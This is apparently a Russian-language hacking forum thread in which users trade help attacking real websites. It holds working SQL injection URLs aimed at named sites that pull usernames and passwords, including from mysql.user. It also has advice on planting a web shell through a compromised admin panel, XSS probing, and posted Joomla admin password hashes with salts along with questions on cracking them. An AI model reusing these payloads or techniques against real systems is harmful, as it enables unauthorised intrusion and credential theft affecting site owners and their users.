Проблема такая - есть админка, есть возможность редактирования страниц ( в т.ч. вставка произвольного пхп кода, который выполнится ) ( все страницы в виде site.com/kkk.php?id=x ) , но вставив код веб-шелла в одну из страниц и перейдя по ней я увидел вместо шелла какие-то каракули =/ Что можно сделать чтобы получить веб-шелл ? Евал шелл имеется
0nep@t0p, попробуй вставить зашифрованный код.. или как вариант - код простенького аплоадера, а через него ( если он выполнится ) заливай шел.. но если каракули там скорее всего MIME type не для выполнения стоит
Доброго времени суток всем. Поможите пожалуйста столкнулся с проблемой при вводе корректной sql-инъекции(где имена полей угаданы после суточного ручного перебора) сайт выдаёт свою дефолтную страницу, пример: _http://www.tarmatrade.ee/index.php?cat=-1+union+select+1,concat_ws(0x3a,nimi,parool)+from+tarma_kasutajad+limit+0,1/* для наглядности зделаем ошибку в поле с именем nimi, заменим на name _http://www.tarmatrade.ee/index.php?cat=-9999+union+select+1,concat_ws(0x3a,name,parool)+from+tarma_kasutajad+limit+0,1/* и картина уже совершенно иная. Как всё же обойти эту защиту и прочитать результат запроса. (пробовал через Navisckope, но то ли руки кривые, то ли...)
сегодня гуляя по сайте наткнулся на такое... Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150 Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151 интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой... http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
>> Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150 Нету доступа к мускулю. Это не уязвимость.
Да что то информатион_схема недоступна. Но мысли есть вот такие http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HEX(password)),3,4,UNHEX(HEX(user_name)),6,7+from+user Вдогонку http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HEX(password)),3,4,UNHEX(HEX(user)),6,7+from+mysql.user+limit+0,1
Вопросик, сидел вводил всякое в поисках XSS. Ввел полную белеберду в поле ввода мыла получил переадресацию на другой сайт. alert()> вылезло за пределы поля для ввода текста </script скушало. А вверху закрасовалось вот такая ошибка БД: Это уязвимость? Или просто тупой глюк?
Достал я парол я хэши из джумлы admin:6f0f0e2db9c8f58e2b309afa6569f744SX0uUSDl4IrdL63 или admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvvaP7o9I а как его рассшифровать? где сервисы? просто md5 не помогает тут он какойто хитрожопый как такое расшифровывать?
спасибо но думаю не в этом дело, я то знаю сервисы где md5 можно подобрать, А тут вроде как конкотинасия пароля с правой кадаброй после :. Вот мне интересны сервисы кот позволяют узнать пароль вбив хэш и кадабру. Или как это вообще можно сделать